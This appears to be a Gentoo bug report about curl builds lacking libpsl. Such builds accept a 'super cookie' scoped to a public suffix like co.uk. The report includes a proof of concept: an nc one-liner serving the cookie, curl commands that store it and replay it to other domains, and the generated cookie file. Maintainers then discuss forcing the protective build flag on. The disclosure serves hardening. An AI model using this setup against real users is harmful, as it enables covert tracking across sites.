A malicious website can set a super cookie if the victim requests the url. The cookie will be transmitted to other websites that are then queried. This requires curl to be compiled without libpsl support. It is recommended to build curl with libpsl support. libpsl support can be verified with curl --version. Gentoo by default does not have this included. Proof of Concept ---------------- 1. Use the below code to set up a malicious server in any curl version compiled without libpsl support. ``` echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super_cookie=tracking_you_across_domains; domain=co.uk; \r\nContent-Length: 0\r\n"| nc -l 8000 ``` 2. Run the below command, and notice that cookies are saved to cookies.txt ``` curl yadhu.co.uk:8000 -c cookies.txt ``` Generated cookie file: ``` # Netscape HTTP Cookie File # This file was generated by libcurl! Edit at your own risk. .co.uk TRUE / FALSE 0 super_cookie tracking_you_across_domains ``` 3. Use the same cookies.txt file to send requests to other `.co.uk` domains. ``` curl someoneelse.co.uk:8000 -b cookies.txt --verbose ``` Refer - daniel.haxx.se/blog/2024/01/10/psl-in-curl/
This USE flag is already default-on in the ebuild. However, based on the potential security problems of disabling it, maybe we should force it on in profiles and maybe give the user an ewarn (probably linking to Daniel's article) if disabled? What do we think?
Already reported. *** This bug has been marked as a duplicate of bug 919325 ***